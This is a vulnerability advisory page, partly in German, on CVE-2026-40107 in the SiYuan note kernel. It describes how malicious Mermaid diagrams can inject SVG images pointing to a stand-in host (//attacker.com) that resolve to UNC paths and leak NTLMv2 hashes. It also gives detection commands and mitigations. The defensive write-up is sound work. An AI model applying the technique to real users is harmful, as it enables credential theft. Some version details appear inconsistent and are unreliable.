Plattform
go
Komponente
github.com/siyuan-note/siyuan/kernel
Behoben in
3.6.5
0.0.0-20260407035653-2f416e5253f1
CVE-2026-40107 describes a Server-Side Request Forgery (SSRF) vulnerability discovered in the SiYuan Kernel, the core component of the SiYuan note-taking application. This vulnerability allows an attacker to craft malicious Mermaid diagrams that, when opened by a victim, can trigger the application to make unintended requests to arbitrary URLs. The vulnerability stems from insecure configuration of Mermaid.js within SiYuan, specifically the use of securityLevel: "loose" and htmlLabels: true, enabling the injection of SVG elements with protocol-relative URLs that resolve to UNC paths on Windows, potentially exposing NTLMv2 hashes.
The primary impact of CVE-2026-40107 is the potential for unauthorized access to internal resources and information disclosure. An attacker can embed a malicious Mermaid diagram within a SiYuan note. When a victim opens this note, the application will attempt to fetch the URL specified in the injected SVG <img> tag. On Windows systems, a protocol-relative URL (e.g., //attacker.com/image.png) is resolved as a UNC path (\\attacker.com\image.png). This triggers an SMB connection attempt, automatically sending the victim's NTLMv2 hash to the attacker's server. This can be used for credential theft and subsequent lateral movement within the network. The blast radius extends to any user of the SiYuan application who opens a malicious note, particularly those on Windows systems.
CVE-2026-40107 was publicly disclosed on 2026-04-10. There is currently no indication of active exploitation campaigns targeting this vulnerability. Public proof-of-concept (PoC) code is expected to emerge given the relatively straightforward nature of the exploit. The vulnerability is not currently listed on CISA KEV. The exploit leverages a similar pattern to other SSRF vulnerabilities where protocol-relative URLs are abused to bypass security controls.
Users of SiYuan who rely on Mermaid diagrams for note-taking and visualization are at risk. Environments with shared hosting or legacy Windows systems with weak SMB configurations are particularly vulnerable, as the automatic NTLMv2 hash transmission poses a significant threat.
• windows / supply-chain: Monitor PowerShell execution for suspicious URLs or SMB connections initiated by the SiYuan process. Use Windows Defender to search for alerts related to network connections to unusual domains or UNC paths.
Get-Process -Name SiYuan | Select-Object -ExpandProperty CommandLine | Select-String -Pattern '\\attacker.com'• linux / server: Examine SiYuan's process logs for any unexpected outbound network connections. Use journalctl to filter for errors or warnings related to Mermaid.js or URL fetching.
journalctl -u siyuan -g 'error' -g 'warning'• generic web: Monitor access logs for requests originating from the SiYuan client to unusual or attacker-controlled domains. Check response headers for unexpected content or redirects. Use curl to test for endpoint exposure.
curl -I https://attacker.com/image.pngdisclosure
Exploit-Status
EPSS
0.06% (18% Perzentil)
CISA SSVC
The primary mitigation for CVE-2026-40107 is to upgrade SiYuan Kernel to version 0.0.0-20260407035653-2f416e5253f1 or later. This version includes a fix that properly sanitizes the SVG content, preventing the injection of malicious URLs. As a temporary workaround, consider disabling Mermaid.js support within SiYuan if upgrading is not immediately possible. While a WAF or proxy cannot directly prevent this vulnerability, they can be configured to block outbound SMB connections to suspicious UNC paths. Monitor network traffic for unusual SMB connections originating from SiYuan instances.
Aktualisieren Sie die Mermaid.js Bibliothek auf Version 3.6.4 oder höher, um die Verwundbarkeit zu mindern. Stellen Sie sicher, dass `securityLevel: 'strict'` konfiguriert ist und `htmlLabels: true` deaktiviert ist, um die Injektion von bösartigem Code über Mermaid Diagramme zu verhindern.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2026-40107 is a Server-Side Request Forgery (SSRF) vulnerability in SiYuan Kernel, allowing attackers to trigger arbitrary URL fetches via malicious Mermaid diagrams.
You are affected if you are using a version of SiYuan Kernel prior to 0.0.0-20260407035653-2f416e5253f1 and utilize Mermaid diagrams.
Upgrade SiYuan Kernel to version 0.0.0-20260407035653-2f416e5253f1 or later. Consider temporarily disabling Mermaid diagrams as a workaround.
There is currently no indication of active exploitation campaigns targeting CVE-2026-40107, but public proof-of-concept code is likely.
Refer to the SiYuan project's official release notes and security advisories for the most up-to-date information: [https://github.com/siyuan-note/siyuan/releases](https://github.com/siyuan-note/siyuan/releases)
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.
Lade deine go.mod-Datei hoch und wir sagen dir sofort, ob du betroffen bist.